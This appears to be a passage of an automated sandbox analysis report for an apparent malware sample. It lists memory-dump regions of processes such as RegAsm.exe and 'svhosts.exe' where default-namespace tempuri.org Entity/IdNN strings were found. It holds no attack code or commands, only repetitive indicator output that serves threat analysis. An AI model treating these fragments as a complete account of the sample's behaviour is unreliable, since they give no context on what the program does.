Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Mo
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Qa
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000033D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
